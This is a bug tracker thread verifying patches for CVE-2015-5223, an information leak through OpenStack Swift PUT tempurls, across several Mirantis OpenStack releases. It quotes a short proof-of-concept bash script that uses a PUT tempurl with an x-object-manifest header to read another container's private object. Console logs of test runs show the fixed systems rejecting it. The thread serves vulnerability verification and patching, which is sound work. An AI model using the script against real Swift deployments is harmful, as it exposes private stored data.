Information leak via Swift tempurls (CVE-2015-5223)

fix for 8.0 branch should be merged from upstream

Patch is presented on OpenStack environment, which was deployed by MOS 7.0 ISO #288 RC2.

I found the script which can reproduce the issue in https://bugs.launchpad.net/swift/+bug/1453948 comments:

    #!/bin/bash
    # resetswift
    set -e
    echo "password" > secret
    swift upload private secret
    swift post -H 'x-account-meta-temp-url-key: mykey'
    # create a container for people to upload stuff too
    swift post public
    # attacker: "yes hello, can I have a safe place to upload some of my data?"
    PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
    curl -XPUT -H 'x-object-manifest: private/secret' "http://localhost:8080${PUT_TEMPURL_SIG}" -d ''
    # attacker: "oh yes, that data I just uploaded - can I download it please?"
    PUT_TEMPURL_SIG="$(swift tempurl GET 60 /v1/AUTH_test/public/your-thing mykey)"
    # attacker: only... it's not *MY* data - trolrolrololollolo
    echo ""
    echo "**************************************"
    curl "http://localhost:8080${PUT_TEMPURL_SIG}"
    echo ""
    echo "**************************************"

status changed to Fix Released for MOS 7.0.

Observed Results when I have executed script on MOS 7.0 RC2 environment:

root@node-1:~# #!/bin/bash
root@node-1:~# # resetswift
root@node-1:~# set -e
root@node-1:~# echo "password" > secret
root@node-1:~# swift upload private secret
secret
root@node-1:~# swift post -H 'x-account-meta-temp-url-key: mykey'
root@node-1:~# # create a container for people to upload stuff too
root@node-1:~# swift post public
root@node-1:~# # attacker: "yes hello, can I have a safe place to upload some of my data?"
root@node-1:~# PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
root@node-1:~# curl -XPUT -H 'x-object-manifest: private/secret' "http://localhost:8080${PUT_TEMPURL_SIG}" -d ''
curl: (7) Failed to connect to localhost port 8080: Connection refused

So, looks like it is correct behavior.

root@node-1:~# PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
root@node-1:~# curl -XPUT -H 'x-object-manifest: private/secret' "http://192.168.0.3:8080${PUT_TEMPURL_SIG}" -d ''
401 Unauthorized: Temp URL invalid

Verified on 6.0 with patch for Juno. I used script from Timur's comment

Timur's verification is wrong.
Valid script for verification:
https://paste.mirantis.net/show/1129/

Verified on 7.0 with the script above.

https://paste.mirantis.net/show/1130/

Right scenario: https://paste.mirantis.net/show/1131/

Verified on 6.1.
Packages: {python-swift,swift,swift-account,swift-container,swift-object,swift-proxy}=2.2.0-1~u14.04+mos6+git.e13ab23.8be0903
Workaround for run swift after update packages:
https://paste.mirantis.net/show/1132/
Workaround needed because of error during restart swift-proxy server:
https://paste.mirantis.net/show/1133/

Verified on MOS 7.0 ISO #288 RC2

root@node-23:~# #!/bin/bash -ex
root@node-23:~# . openrc
root@node-23:~# CHECK_MESSAGE="password"
root@node-23:~# echo ${CHECK_MESSAGE} > secret
root@node-23:~# swift upload private secret
secret
root@node-23:~# swift post -H 'x-account-meta-temp-url-key: mykey'
root@node-23:~# swift post public
root@node-23:~# URL=$(echo ${OS_AUTH_URL} | sed -e "s|:5000/v2.0/||")
root@node-23:~# TENANT_ID=$(keystone tenant-get $OS_USERNAME | awk '/id/ {print $4}')
/usr/lib/python2.7/dist-packages/keystoneclient/shell.py:65: DeprecationWarning: The keystone CLI is deprecated in favor of python-openstackclient. For a Python library, continue using python-keystoneclient.
  'python-keystoneclient.', DeprecationWarning)
root@node-23:~# PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_${TENANT_ID}/public/your-thing mykey)"
root@node-23:~# curl -i -XPUT ${URL}:8080${PUT_TEMPURL_SIG} -H'x-object-manifest: private/secret' -H'Content-Length: 0'
HTTP/1.1 400 Bad Request
Date: Thu, 17 Sep 2015 15:56:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 83
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?><Error><Code>InvalidBucketName</Code></Error>root@node-23:~# GET_TEMPURL_SIG="$(swift tempurl GET 60 /v1/AUTH_${TENANT_ID}/public/your-thing mykey)"
root@node-23:~# OUTPUT=$(curl -i ${URL}:8080${GET_TEMPURL_SIG} 2>&1 | tail -1)
root@node-23:~# swift delete private &>/dev/null
root@node-23:~# swift delete public &>/dev/null
root@node-23:~# rm secret
root@node-23:~# set +x
root@node-23:~#
root@node-23:~# echo -e "\n\n\n------- Check output -------\n\n\n"

------- Check output -------

root@node-23:~#
root@node-23:~# if [[ ${CHECK_MESSAGE} == ${OUTPUT} ]]; then
> echo -e "Bug reproduced. exit 1\n\n\n-------"
> exit 1
> else
> echo -e "Bug not reproduced\n\n\n-------"
> fi
Bug not reproduced

-------
root@node-23:~#

Fix proposed to branch: openstack-ci/fuel-5.1.1-updates/2014.1.1
Change author: Clay Gerrard <email address hidden>
Review: https://review.fuel-infra.org/13258

Fix proposed to branch: openstack-ci/fuel-8.0/liberty
Change author: Alexey Khivin <email address hidden>
Review: https://review.fuel-infra.org/13382

Reviewed: https://review.fuel-infra.org/13258
Submitter: Vitaly Sedelnik <email address hidden>
Branch: openstack-ci/fuel-5.1.1-updates/2014.1.1

Commit: f5e1b93e7f26e0eebe08b6fa04d4b5cbf5f769c4
Author: Clay Gerrard <email address hidden>
Date: Wed Oct 28 14:07:58 2015

Disallow unsafe tempurl operations to point to unauthorized data

Do not allow PUT tempurls to create pointers to other data. Specifically
disallow the creation of DLO object manifests by returning an error if a
non-safe tempurl request includes an X-Object-Manifest header regardless of
the value of the header.

This prevents discoverability attacks which can use any PUT tempurl to probe
for private data by creating a DLO object manifest and then using the PUT
tempurl to head the object which would 404 if the prefix does not match any
object data or form a valid DLO HEAD response if it does.

This also prevents a tricky and potentially unexpected consequence of PUT
tempurls which would make it unsafe to allow a user to download objects
created by tempurl (even if they just created them) because the result of
reading the object created via tempurl may not be the data which was uploaded.

[CVE-2015-5223]

Co-Authored-By: Kota Tsuyuzaki <email address hidden>

Closes-Bug: #1487450

(cherry-picked from commit 0694e1911d10a18075ff99462c96781372422b2c)

Change-Id: I91161dfb0f089c3990aca1b4255b520299ef73c8

Change abandoned by Alexey Khivin <email address hidden> on branch: openstack-ci/fuel-8.0/liberty
Review: https://review.fuel-infra.org/13382
Reason: already merged from upstream

Verified on 5.1.1

The commit is present in 8.0: https://review.fuel-infra.org/gitweb?p=openstack/swift.git;a=shortlog;h=refs/heads/openstack-ci/fuel-8.0/liberty

Verified on 8.0